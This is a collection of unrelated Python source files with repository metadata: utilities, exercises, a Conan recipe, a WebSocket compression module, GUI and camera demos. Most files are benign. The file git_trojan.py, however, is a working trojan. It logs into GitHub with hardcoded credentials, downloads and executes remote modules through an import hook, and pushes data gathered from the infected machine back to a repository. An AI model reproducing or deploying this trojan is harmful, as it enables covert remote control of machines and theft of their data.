1d2e8da3aa4aa845dfd246adf1fb16568c6e21fe
/bakery/venv/bin/pip2
b35d65ae05505ed7d6725acf4252ae497a18b037
[]
no_license
stanislaw-rzewuski/REST-automation-demo
732e5fb846c8ae1d0ba9b5ca0462f96fc33828ef
00842d798c211f5eec11fd2dc9642d6cc0ac7a97
refs/heads/master
2020-07-02T13:32:17.956593
2019-09-01T23:45:26
2019-09-01T23:45:26
201,534,799
0
0
null
null
null
null
UTF-8
Python
false
false
262
#!/home/stan/repos/REST-automation-demo/bakery/venv/bin/python2.7 # -*- coding: utf-8 -*- import re import sys from pip._internal import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
[ "stanislaw.rzewuski@gmail.com" ]
stanislaw.rzewuski@gmail.com
b83067167ec0f4fa218892d23cdf72fb3e4791d4
bf92c350a1799ac463bad046e8eea3271aeb7b15
/3ds/tests/screen-metrics.py
2ffeb6e74a166976529130f118d5f1990d13fa5c
[ "MIT" ]
permissive
ObsidianX/3ds_monty
72065dbdfe9890c1a02bb0988aa0a5dd591a8cc6
8dc10ca4874175dffcb9c95d1e294c74f3c47ee2
refs/heads/master
2021-09-24T18:12:10.556030
2021-09-18T10:32:51
2021-09-18T10:32:51
56,961,916
20
6
MIT
2021-09-18T10:32:52
2016-04-24T08:30:45
C
UTF-8
Python
false
false
742
py
from citrus import * import sf2d gfx.init_default() top = console.PrintConsole(gfx.SCREEN_TOP, window=(2, 2, 46, 26)) metrics = { "top_width": sf2d.screen['top']['width'], "top_height": sf2d.screen['top']['height'], "bot_width": sf2d.screen['bottom']['width'], "bot_height": sf2d.screen['bottom']['height'] } print("""Screen metrics: Top screen: width = %(top_width)s height = %(top_height)s Bottom screen: width = %(bot_width)s height = %(bot_height)s""" % metrics) top.set_position(13, 25) print('Press Start to exit') while apt.main_loop(): hid.scan_input() if hid.keys_down() & hid.KEY_START: break gfx.flush_buffers() gfx.swap_buffers() gsp.wait_for_vblank() gfx.exit()
[ "obsidianx@gmail.com" ]
obsidianx@gmail.com
7570d43bec14a9efea7e4ecd9455860a4ec6ea78
3666c88c1bb764e3d98bbfd56205c8b988a254f1
/ALDS1_9_D.py
f4e5af35a7d7b51efe204e2705e5f166427ace50
[]
no_license
shi-mo/aoj
538b97e7d56136df0197ad015cc85c5aa9501ca5
b058e77a53163a0ada1425d3966b45b2619e275c
refs/heads/master
2023-04-02T18:33:43.783422
2023-03-20T12:20:37
2023-03-20T12:20:37
6,807,323
0
0
null
null
null
null
UTF-8
Python
false
false
429
py
def unshift(a, i): while 1 < i: tmp = a[i] a[i] = a[i//2] a[i//2] = tmp i = i//2 def reverse_heap_sort(a): n = len(a) a = [None] + a hsize = 1 while hsize < n: unshift(a, hsize) hsize += 1 tmp = a[1] a[1] = a[hsize] a[hsize] = tmp return a[1:] _ = input() a = [int(x) for x in input().split()] print(*reverse_heap_sort(sorted(a)))
[ "yoshifumi.shimono@gmail.com" ]
yoshifumi.shimono@gmail.com
52c940283704d2f43f630be09f5c5b68923fc333
7032fd0d1652cc1bec1bff053af4f486a5704cd5
/old/OpenExrId_1.0-beta.17/conanfile.py
dcb74bafee3fb8349547a73fae2331e0d04f1a9f
[]
no_license
MercenariesEngineering/conan_recipes
c8f11ddb3bd3eee048dfd476cdba1ef84b85af5e
514007facbd1777799d17d041fc34dffef61eff8
refs/heads/master
2023-07-09T08:10:35.941112
2023-04-19T13:36:38
2023-04-19T13:36:38
169,575,224
7
1
null
2023-04-19T14:11:35
2019-02-07T13:23:02
C++
UTF-8
Python
false
false
2,256
py
from conans import ConanFile, CMake, tools import os, shutil #conan remote add conan-transit https://api.bintray.com/conan/conan/conan-transit #conan remote add hulud https://api.bintray.com/conan/hulud/libs #conan remote add pierousseau https://api.bintray.com/conan/pierousseau/libs class OpenEXRIdConan(ConanFile): name = "OpenExrId" version = "1.0-beta.17" license = "MIT" url = "https://github.com/MercenariesEngineering/openexrid" description = "OpenEXR files able to isolate any object of a CG image with a perfect antialiazing " settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False], "fPIC": [True, False] } default_options = "shared=False","*:shared=False","fPIC=True" generators = "cmake" def requirements(self): # From our recipes : self.requires("zlib/1.2.11@pierousseau/stable") self.requires("IlmBase/2.2.0@pierousseau/stable") self.requires("OpenEXR/2.2.0@pierousseau/stable") self.requires("re2/2019-06-01@pierousseau/stable") self.requires("OpenImageIO/1.6.18@pierousseau/stable") def configure(self): if self.settings.os == "Linux": # fPIC option exists only on linux self.options["boost"].fPIC=True self.options["IlmBase"].fPIC=True self.options["OpenEXR"].fPIC=True self.options["OpenImageIO"].fPIC=True self.options["re2"].fPIC=True self.options["zlib"].fPIC=True def source(self): self.run("git clone http://github.com/MercenariesEngineering/openexrid.git --branch %s" % self.version) def build(self): cmake = CMake(self) #cmake.verbose = True cmake.definitions["USE_CONAN"] = True cmake.definitions["BUILD_LIB"] = True cmake.definitions["BUILD_PLUGINS"] = False cmake.configure(source_dir="%s/openexrid" % self.source_folder) cmake.build() def package(self): self.copy("*.h", dst="include/openexrid", src="openexrid/openexrid") self.copy("*.lib", dst="lib", keep_path=False) self.copy("*.a", dst="lib", keep_path=False) def package_info(self): self.cpp_info.libs = tools.collect_libs(self)
[ "rousseau@mercenaries-engineering.com" ]
rousseau@mercenaries-engineering.com
73720836ac4d19c75a01a8faa535d62cefe97bf7
58399ec14cef82b023fb9eb83188cd3f4f5f8c20
/timeexample.py
8247868e85c8c924d2d8e0e61bab5da117fab710
[]
no_license
Venky9791/Venky_Geekexample
0baf4262c05cfa1db4e2b2dfa57f05a2297b11da
02d0389949d7add55a115ee9c02e064688706a9e
refs/heads/master
2020-06-26T19:08:01.335717
2019-08-04T22:22:45
2019-08-04T22:22:45
199,725,955
0
0
null
null
null
null
UTF-8
Python
false
false
665
py
import time from time import perf_counter as mytimer import random import tkinter print (tkinter.TkVersion) print (tkinter.TclVersion) mainwindow = tkinter.Tk() mainwindow.title = "My First Example GUI" mainwindow.geometry('640*640+8+400') mainwindow.mainloop() # input("Press enter to Start the timeer") # waittime= random.randint(1,6) # time.sleep(waittime) # starttime = mytimer() # endtime= input ("Press Enter to Stop the timer") # endtime=mytimer() # # # print("Started at"+time.strftime("%X",time.localtime(starttime))) # print("Ended at"+time.strftime("%X",time.localtime(endtime))) # print ("Your Reaction time is {} seconds" .format(endtime-starttime))
[ "bharthivenky76@gmail.com" ]
bharthivenky76@gmail.com
3cfa851500fb84c304d21eae3159205368643a00
d54afd55df19afffa98dd767b812f24d204e9d1b
/Querying SQLite from Python-256.py
6d038843eb0505f231aed39453320b21ab9c8ce2
[]
no_license
nemkothari/Sql-Fundamentals
b7666a8ff64525a8cb02afccede2aa47178c7eb3
99bc7be798bbe88eef2af12eea5a9851d9e38914
refs/heads/master
2020-04-10T15:39:40.572504
2018-12-10T04:39:59
2018-12-10T04:39:59
161,117,632
0
0
null
null
null
null
UTF-8
Python
false
false
805
py
## 3. Connecting to the Database ## import sqlite3 conn = sqlite3.connect('jobs.db') ## 6. Creating a Cursor and Running a Query ## import sqlite3 conn = sqlite3.connect("jobs.db") cursor = conn.cursor() query = "select Major from recent_grads;" cursor.execute(query) majors = cursor.fetchall() print(majors[0:2]) ## 8. Fetching a Specific Number of Results ## import sqlite3 conn = sqlite3.connect("jobs.db") qry =" select Major , Major_category from recent_grads" five_results=conn.execute(qry).fetchmany(5) ## 9. Closing the Database Connection ## conn = sqlite3.connect("jobs.db") conn.close() ## 10. Practice ## import sqlite3 con = sqlite3.connect("jobs2.db") qrt= 'select Major from recent_grads order by Major desc' reverse_alphabetical = conn.execute(qrt).fetchall() con.close()
[ "noreply@github.com" ]
noreply@github.com
74d21d6d9cafd0126d88ab224385192c6153a0aa
15e820be4636b1f95c962ed5d63d52d4abacc8dc
/Tutorial/Flask/4_CameraStreaming/camera.py
4aba9a540cb41e882da9d45986107c480c032966
[]
no_license
hashimotodaisuke/PlantFactoryTutorial
c2accab8c9fc6e618b2b10d475f5867db3a4996d
cb1dfb99929a44d97c251fa3682890e815372b3d
refs/heads/master
2023-05-31T01:28:31.963952
2021-07-05T00:19:13
2021-07-05T00:19:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,191
py
import cv2 class VideoCamera(object): def __init__(self): self.video = cv2.VideoCapture(0) # Opencvのカメラをセットします。(0)はノートパソコンならば組み込まれているカメラ def __del__(self): self.video.release() def get_frame(self): # read()は、二つの値を返すので、success, imageの2つ変数で受けています。 # OpencVはデフォルトでは raw imagesなので JPEGに変換 # ファイルに保存する場合はimwriteを使用、メモリ上に格納したい時はimencodeを使用 # cv2.imencode() は numpy.ndarray() を返すので .tobytes() で bytes 型に変換 success, image = self.video.read() if success == True: ret, jpeg = cv2.imencode('.jpg', image) # self.video.read fail時何も返さないと復帰しないため静止画を返す # ちなみにfailになるのは複数のブラウザから表示した時 else: image = cv2.imread('/home/pi/Picture/raspi.png', cv2.IMREAD_GRAYSCALE) ret, jpeg = cv2.imencode('.jpg', image) return jpeg.tobytes()
[ "hashi.uniden@gmail.com" ]
hashi.uniden@gmail.com
067f9f37e818e5bb7b065854d145ba1f603166aa
9680c83911441f9e796a8c87a38f060756911552
/git_trojan.py
4eb5f066268b109f3909c0c1962f4a578339fd7d
[]
no_license
qk13warcraft/chapter7
bdf69b5ecd47ff7888e87a3ec9026fa6291a41f4
e1300162725b1b61b530bfaf7bafa534da04f564
refs/heads/master
2021-01-21T21:04:58.298208
2017-05-25T14:54:55
2017-05-25T14:54:55
92,299,812
0
0
null
null
null
null
UTF-8
Python
false
false
3,610
py
# -*- coding: utf-8 -*- import json import base64 import sys import time import imp import random import threading import Queue import os from github3 import login """ 木马主体框架,从GitHub上下载配置选项和运行的模块代码 ttp://github3py.readthedocs.io/en/master/repos.html#github3.repos.branch.Branch """ trojan_id = "abc" #唯一标识了木马文件 trojan_config = "%s.json" %trojan_id data_path = "data/%s/" %trojan_id trojan_modules = [] configured = False task_queue = Queue.Queue() def connect_to_github(): """ 连接github,对用户进行认证,获取当前的repo和branch的对象提供给其他函数使用 """ gh = login(username="qk13warcraft",password = "qk14warcraft") repo = gh.repository("qk13warcraft","chapter7") branch = repo.branch("master") return gh,repo,branch def get_file_contents(filepath): """ 从远程的repo中抓取文件,将文件内容读取到本地变量中 """ gh,repo,branch = connect_to_github() tree = branch.commit.commit.tree.recurse() for filename in tree.tree: if filepath in filename.path: print "[*] Found file %s" %filepath blob = repo.blob(filename._json_data['sha']) return blob.content return None def get_trojan_config(): """ 获得repo中的远程配置文件,木马解析其中的内容获得需要运行的模块名称 """ global configured config_json = get_file_contents(trojan_config) config = json.loads(base64.b64decode(config_json)) configured = True for task in config: if task['module'] not in sys.modules: exec("import %s" %task['module']) return config def store_module_result(data): """ 将从目标机器上手机的数据推送到repo中 """ gh,repo,branch = connect_to_github() remote_path = "data/%s/%d.data" %(trojan_id,random.randint(1000,100000)) repo.create_file(remote_path,"Commit message",base64.b64encode(data)) return class GitImporter(object): """ 当python解释器加载不存在的模块时,该类就会被调用 """ def __init__(self): self.current_module_code = "" def find_module(self,fullname,path=None): """ 尝试获取模块所在的位置 """ if configured: print "[*] Attempting to retrieve %s" %fullname new_library = get_file_contents("modules/%s" %fullname) #如果能定位到所需的模块文件,则对其中的内容进行解密并将结果保存到该类中 #通过返回self变量,告诉python解释器找到了所需的模块 if new_library is not None: self.current_module_code = base64.b64decode(new_library) return self return None def load_module(self,name): """ 完成模块的实际加载过程,先利用本地的imp模块创建一个空的模块对象,然后将GitHub中获得的代码导入到 这个对象中,最后,将这个新建的模块添加到sys.modules列表中,这样在之后的代码中就可以 import 方法 调用这个模块了 """ module = imp.new_module(name) exec self.current_module_code in module.__dict__ sys.modules[name] = module return module def module_runner(module): task_queue.put(1) result = sysy.modules[module].run() task_queue.get() #保存结果到我们的repo中 store_module_result(result) return #木马的主循环 sys.meta_path = [GitImporter()] while True: if task_queue.empty(): config = get_trojan_config() for task in config: t = threading.Thread(target=module_runner,args=(task['module'],)) t.start() time.sleep(random.randint(1,10)) time.sleep(random.randint(1000,10000))
[ "qk13warcraft@163.com" ]
qk13warcraft@163.com
942d5f383fb074463bde66060a1faedb97568626
1033c93917117f462771571c29dd046954582bd8
/revscores/features/proportion_of_symbolic_added.py
2eeae56295eca238e2c206c786853e46201b8d7b
[ "MIT" ]
permissive
jonasagx/Revision-Scoring
d4e3e892ac5de3a7f3032ef2b4fcc7b6efb20330
dfacba014e30d49577aa1a56aab13393ecede9d5
refs/heads/master
2021-01-17T11:57:39.393734
2015-01-10T19:13:02
2015-01-10T19:13:02
29,064,762
0
1
null
2015-01-10T19:13:03
2015-01-10T17:25:22
Python
UTF-8
Python
false
false
501
py
from .chars_added import chars_added from .feature import Feature from .symbolic_chars_added import symbolic_chars_added def process(chars_added, symbolic_chars_added): return symbolic_chars_added/(chars_added or 1) proportion_of_symbolic_added = Feature("proportion_of_symbolic_added", process, returns=float, depends_on=[chars_added, symbolic_chars_added])
[ "aaron.halfaker@gmail.com" ]
aaron.halfaker@gmail.com
c7741bf2134b8580c0fa764a5a86ef149790da35
1e39e416db368a47c2cfe5eadf797abe2bf3ad4a
/model.py
e70d5dcc2dc4fda4425423d78f294e093224f0f4
[]
no_license
r00t4/dog
5846ddf52e0fda1ab30c4c7a027f87f1339f8d48
1c99dcd08d9610609efa4e558d4b2e4737e32de2
refs/heads/master
2020-09-09T15:19:35.323134
2019-11-13T13:56:28
2019-11-13T13:56:28
221,471,170
0
0
null
null
null
null
UTF-8
Python
false
false
1,198
py
import torch import torch.nn as nn import torch.nn.functional as F class NeuralNetwork(nn.Module): def __init__(self): super(NeuralNetwork, self).__init__() self.conv1 = nn.Conv2d(3, 16, 3, padding=1) self.conv2 = nn.Conv2d(16, 32, 3, padding=1) self.conv3 = nn.Conv2d(32, 64, 3, padding=1) self.conv4 = nn.Conv2d(64, 128, 3, padding=1) self.conv5 = nn.Conv2d(128, 256, 3) self.fc1 = nn.Linear(256*12*12, 4096) self.fc2 = nn.Linear(4096, 1024) self.fc3 = nn.Linear(1024, 120) def forward(self, input): x = self.conv1(input) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv2(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv3(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv4(x) x = F.relu(x) x = F.max_pool2d(x, 2) x = self.conv5(x) x = F.relu(x) # print(x.shape) x = x.view(-1, 256*12*12) # print(len(x)) x = self.fc1(x) x = F.relu(x) x = self.fc2(x) x = F.relu(x) out = self.fc3(x) return out
[ "kborash@dar.kz" ]
kborash@dar.kz
fe3c331699a0e001fa186a6177c1df7612b048b4
0b64d153144478bc87c8e187c54de2faeb660641
/env/Lib/site-packages/autobahn/websocket/compress_snappy.py
cee3d60ccdb0ca60fe4d33a7ec7db60622e4bcb3
[ "LicenseRef-scancode-free-unknown", "LicenseRef-scancode-other-copyleft", "GPL-1.0-or-later", "bzip2-1.0.6", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-proprietary-license", "LicenseRef-scancode-newlib-historical", "OpenSSL", "Python-2.0", "TCL", "LicenseRef-scancode-python-cwi", "MIT" ]
permissive
YUND4/smartlights
db4d102fd983db355941431553818f243ffd682f
a86d5e68b4e3c72b133a6853ebd4a1ed0f2623d4
refs/heads/master
2022-12-24T11:38:06.669241
2019-07-12T16:55:01
2019-07-12T16:55:01
196,614,236
0
1
MIT
2022-12-11T22:42:03
2019-07-12T16:52:16
HTML
UTF-8
Python
false
false
16,978
py
############################################################################### # # The MIT License (MIT) # # Copyright (c) Crossbar.io Technologies GmbH # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ############################################################################### from __future__ import absolute_import import snappy from autobahn.websocket.compress_base import PerMessageCompressOffer, \ PerMessageCompressOfferAccept, \ PerMessageCompressResponse, \ PerMessageCompressResponseAccept, \ PerMessageCompress __all__ = ( 'PerMessageSnappyMixin', 'PerMessageSnappyOffer', 'PerMessageSnappyOfferAccept', 'PerMessageSnappyResponse', 'PerMessageSnappyResponseAccept', 'PerMessageSnappy', ) class PerMessageSnappyMixin(object): """ Mixin class for this extension. """ EXTENSION_NAME = "permessage-snappy" """ Name of this WebSocket extension. """ class PerMessageSnappyOffer(PerMessageCompressOffer, PerMessageSnappyMixin): """ Set of extension parameters for `permessage-snappy` WebSocket extension offered by a client to a server. """ @classmethod def parse(cls, params): """ Parses a WebSocket extension offer for `permessage-snappy` provided by a client to a server. :param params: Output from :func:`autobahn.websocket.WebSocketProtocol._parseExtensionsHeader`. :type params: list :returns: A new instance of :class:`autobahn.compress.PerMessageSnappyOffer`. :rtype: obj """ # extension parameter defaults accept_no_context_takeover = False request_no_context_takeover = False # verify/parse client ("client-to-server direction") parameters of permessage-snappy offer for p in params: if len(params[p]) > 1: raise Exception("multiple occurrence of extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) val = params[p][0] if p == 'client_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: accept_no_context_takeover = True elif p == 'server_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: request_no_context_takeover = True else: raise Exception("illegal extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) offer = cls(accept_no_context_takeover, request_no_context_takeover) return offer def __init__(self, accept_no_context_takeover=True, request_no_context_takeover=False): """ :param accept_no_context_takeover: Iff true, client accepts "no context takeover" feature. :type accept_no_context_takeover: bool :param request_no_context_takeover: Iff true, client request "no context takeover" feature. :type request_no_context_takeover: bool """ if type(accept_no_context_takeover) != bool: raise Exception("invalid type %s for accept_no_context_takeover" % type(accept_no_context_takeover)) self.accept_no_context_takeover = accept_no_context_takeover if type(request_no_context_takeover) != bool: raise Exception("invalid type %s for request_no_context_takeover" % type(request_no_context_takeover)) self.request_no_context_takeover = request_no_context_takeover def get_extension_string(self): """ Returns the WebSocket extension configuration string as sent to the server. :returns: PMCE configuration string. :rtype: str """ pmce_string = self.EXTENSION_NAME if self.accept_no_context_takeover: pmce_string += "; client_no_context_takeover" if self.request_no_context_takeover: pmce_string += "; server_no_context_takeover" return pmce_string def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'accept_no_context_takeover': self.accept_no_context_takeover, 'request_no_context_takeover': self.request_no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyOffer(accept_no_context_takeover = %s, request_no_context_takeover = %s)" % (self.accept_no_context_takeover, self.request_no_context_takeover) class PerMessageSnappyOfferAccept(PerMessageCompressOfferAccept, PerMessageSnappyMixin): """ Set of parameters with which to accept an `permessage-snappy` offer from a client by a server. """ def __init__(self, offer, request_no_context_takeover=False, no_context_takeover=None): """ :param offer: The offer being accepted. :type offer: Instance of :class:`autobahn.compress.PerMessageSnappyOffer`. :param request_no_context_takeover: Iff true, server request "no context takeover" feature. :type request_no_context_takeover: bool :param no_context_takeover: Override server ("server-to-client direction") context takeover (this must be compatible with offer). :type no_context_takeover: bool """ if not isinstance(offer, PerMessageSnappyOffer): raise Exception("invalid type %s for offer" % type(offer)) self.offer = offer if type(request_no_context_takeover) != bool: raise Exception("invalid type %s for request_no_context_takeover" % type(request_no_context_takeover)) if request_no_context_takeover and not offer.accept_no_context_takeover: raise Exception("invalid value %s for request_no_context_takeover - feature unsupported by client" % request_no_context_takeover) self.request_no_context_takeover = request_no_context_takeover if no_context_takeover is not None: if type(no_context_takeover) != bool: raise Exception("invalid type %s for no_context_takeover" % type(no_context_takeover)) if offer.request_no_context_takeover and not no_context_takeover: raise Exception("invalid value %s for no_context_takeover - client requested feature" % no_context_takeover) self.no_context_takeover = no_context_takeover def get_extension_string(self): """ Returns the WebSocket extension configuration string as sent to the server. :returns: PMCE configuration string. :rtype: str """ pmce_string = self.EXTENSION_NAME if self.offer.request_no_context_takeover: pmce_string += "; server_no_context_takeover" if self.request_no_context_takeover: pmce_string += "; client_no_context_takeover" return pmce_string def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'offer': self.offer.__json__(), 'request_no_context_takeover': self.request_no_context_takeover, 'no_context_takeover': self.no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyAccept(offer = %s, request_no_context_takeover = %s, no_context_takeover = %s)" % (self.offer.__repr__(), self.request_no_context_takeover, self.no_context_takeover) class PerMessageSnappyResponse(PerMessageCompressResponse, PerMessageSnappyMixin): """ Set of parameters for `permessage-snappy` responded by server. """ @classmethod def parse(cls, params): """ Parses a WebSocket extension response for `permessage-snappy` provided by a server to a client. :param params: Output from :func:`autobahn.websocket.WebSocketProtocol._parseExtensionsHeader`. :type params: list :returns: A new instance of :class:`autobahn.compress.PerMessageSnappyResponse`. :rtype: obj """ client_no_context_takeover = False server_no_context_takeover = False for p in params: if len(params[p]) > 1: raise Exception("multiple occurrence of extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) val = params[p][0] if p == 'client_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: client_no_context_takeover = True elif p == 'server_no_context_takeover': # noinspection PySimplifyBooleanCheck if val is not True: raise Exception("illegal extension parameter value '%s' for parameter '%s' of extension '%s'" % (val, p, cls.EXTENSION_NAME)) else: server_no_context_takeover = True else: raise Exception("illegal extension parameter '%s' for extension '%s'" % (p, cls.EXTENSION_NAME)) response = cls(client_no_context_takeover, server_no_context_takeover) return response def __init__(self, client_no_context_takeover, server_no_context_takeover): self.client_no_context_takeover = client_no_context_takeover self.server_no_context_takeover = server_no_context_takeover def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'client_no_context_takeover': self.client_no_context_takeover, 'server_no_context_takeover': self.server_no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyResponse(client_no_context_takeover = %s, server_no_context_takeover = %s)" % (self.client_no_context_takeover, self.server_no_context_takeover) class PerMessageSnappyResponseAccept(PerMessageCompressResponseAccept, PerMessageSnappyMixin): """ Set of parameters with which to accept an `permessage-snappy` response from a server by a client. """ def __init__(self, response, no_context_takeover=None): """ :param response: The response being accepted. :type response: Instance of :class:`autobahn.compress.PerMessageSnappyResponse`. :param no_context_takeover: Override client ("client-to-server direction") context takeover (this must be compatible with response). :type no_context_takeover: bool """ if not isinstance(response, PerMessageSnappyResponse): raise Exception("invalid type %s for response" % type(response)) self.response = response if no_context_takeover is not None: if type(no_context_takeover) != bool: raise Exception("invalid type %s for no_context_takeover" % type(no_context_takeover)) if response.client_no_context_takeover and not no_context_takeover: raise Exception("invalid value %s for no_context_takeover - server requested feature" % no_context_takeover) self.no_context_takeover = no_context_takeover def __json__(self): """ Returns a JSON serializable object representation. :returns: JSON serializable representation. :rtype: dict """ return {'extension': self.EXTENSION_NAME, 'response': self.response.__json__(), 'no_context_takeover': self.no_context_takeover} def __repr__(self): """ Returns Python object representation that can be eval'ed to reconstruct the object. :returns: Python string representation. :rtype: str """ return "PerMessageSnappyResponseAccept(response = %s, no_context_takeover = %s)" % (self.response.__repr__(), self.no_context_takeover) class PerMessageSnappy(PerMessageCompress, PerMessageSnappyMixin): """ `permessage-snappy` WebSocket extension processor. """ @classmethod def create_from_response_accept(cls, is_server, accept): pmce = cls(is_server, accept.response.server_no_context_takeover, accept.no_context_takeover if accept.no_context_takeover is not None else accept.response.client_no_context_takeover) return pmce @classmethod def create_from_offer_accept(cls, is_server, accept): pmce = cls(is_server, accept.no_context_takeover if accept.no_context_takeover is not None else accept.offer.request_no_context_takeover, accept.request_no_context_takeover) return pmce def __init__(self, is_server, server_no_context_takeover, client_no_context_takeover): self._is_server = is_server self.server_no_context_takeover = server_no_context_takeover self.client_no_context_takeover = client_no_context_takeover self._compressor = None self._decompressor = None def __json__(self): return {'extension': self.EXTENSION_NAME, 'server_no_context_takeover': self.server_no_context_takeover, 'client_no_context_takeover': self.client_no_context_takeover} def __repr__(self): return "PerMessageSnappy(is_server = %s, server_no_context_takeover = %s, client_no_context_takeover = %s)" % (self._is_server, self.server_no_context_takeover, self.client_no_context_takeover) def start_compress_message(self): if self._is_server: if self._compressor is None or self.server_no_context_takeover: self._compressor = snappy.StreamCompressor() else: if self._compressor is None or self.client_no_context_takeover: self._compressor = snappy.StreamCompressor() def compress_message_data(self, data): return self._compressor.add_chunk(data) def end_compress_message(self): return "" def start_decompress_message(self): if self._is_server: if self._decompressor is None or self.client_no_context_takeover: self._decompressor = snappy.StreamDecompressor() else: if self._decompressor is None or self.server_no_context_takeover: self._decompressor = snappy.StreamDecompressor() def decompress_message_data(self, data): return self._decompressor.decompress(data) def end_decompress_message(self): pass
[ "syundarivera@gmail.com" ]
syundarivera@gmail.com
987986c93691efd140bd8faaf1832769a486b00e
0116525d908fd3a604dfe6a4da4ffc455d5f7d40
/arraymin.py
963aa15c0df1484c57d06914d65f53f3e30a5e6d
[]
no_license
Krithikasri/set3beginner
c9a18cf20087b72a5aab27c6ba7427a4e05bfb64
2d6269605a48905923d428e1717575759dd5a6ad
refs/heads/master
2020-04-22T03:27:12.009941
2019-02-14T05:48:26
2019-02-14T05:48:26
170,087,158
0
0
null
null
null
null
UTF-8
Python
false
false
62
py
N=int(input()) k=list(map(int,input().split())) print(min(k))
[ "noreply@github.com" ]
noreply@github.com
76f4330d8dd21990e81c8fffc080ff973d8ca274
fbb2ff6d6734e02b24d9eef2a16ebba58c755a1b
/wx_event_propagate.py
bb82371c56ce8e78e08839ab3bdfb4977fd6db15
[]
no_license
brainliubo/wxpython_project
a29fe18eb14c20bc1c348c724460d17d7967dee9
98edc15be6c16b7e413027231b4a512bd37343ee
refs/heads/master
2020-03-24T21:06:09.994644
2019-01-02T11:47:08
2019-01-02T11:47:08
143,013,605
0
0
null
null
null
null
UTF-8
Python
false
false
2,261
py
''' event.Skip() 方法是将event 继续往上一级进行传递的重要方法,如果不调用,则该event只要被catch 一次,就不进行传递了 ''' import wx ID_BUTTON1 = wx.NewId() # 生成2个ID ID_BUTTON2 = wx.NewId() class MyApp(wx.App): def OnInit(self): #app 上添加frame self.frame = MyFrame(None, title="Event Propagation") self.SetTopWindow(self.frame) self.frame.Show() self.Bind(wx.EVT_BUTTON, self.OnButtonApp) return True def OnButtonApp(self, event): event_id = event.GetId() if event_id == ID_BUTTON1 : print ("BUTTON ONE Event reached the App Object") class MyFrame(wx.Frame): def __init__(self, parent, id=wx.ID_ANY, title="event propagate frame",pos=wx.DefaultPosition, size=wx.DefaultSize,style=wx.DEFAULT_FRAME_STYLE,name="MyFrame"): super(MyFrame, self).__init__(parent, id, title,pos, size, style, name) self.panel = MyPanel(self) self.btn1 = wx.Button(self.panel, ID_BUTTON1,"Propagates") self.btn2 = wx.Button(self.panel, ID_BUTTON2, "Doesn't Propagate") sizer = wx.BoxSizer(wx.HORIZONTAL) sizer.Add(self.btn1, 0, wx.ALL, 10) sizer.Add(self.btn2, 0, wx.ALL, 10) self.panel.SetSizer(sizer) self.Bind(wx.EVT_BUTTON, self.OnButtonFrame) def OnButtonFrame(self, event): event_id = event.GetId() if event_id == ID_BUTTON1: print("BUTTON ONE event reached the Frame") event.Skip() elif event_id == ID_BUTTON2: print ("BUTTON TWO event reached the Frame") event.Skip() class MyPanel(wx.Panel): def __init__(self, parent): super(MyPanel, self).__init__(parent) self.Bind(wx.EVT_BUTTON, self.OnPanelButton) def OnPanelButton(self, event): event_id = event.GetId() if event_id == ID_BUTTON1: print ("BUTTON ONE event reached the Panel") event.Skip() elif event_id == ID_BUTTON2: print ("BUTTON TWO event reached the Panel") event.Skip() # Not skipping the event will cause its # propagation to end here if __name__ == "__main__": app = MyApp(False) app.MainLoop()
[ "clairlb@163.com" ]
clairlb@163.com
220274ef4a9b4c4918eadc9760519ac1b39963d8
3cd18a3e789d3a0739768f1ae848d9f74b9dbbe7
/mounth001/day21/exercise03.py
fe9a7a38bb1bfcf3fe7454d21909dc564595ee5d
[]
no_license
Molly-l/66
4bfe2f93e726d3cc059222c93a2bb3460b21ad78
fae24a968f590060522d30f1b278fcfcdab8b36f
refs/heads/master
2020-09-28T12:50:18.590794
2019-11-27T04:42:28
2019-11-27T04:42:28
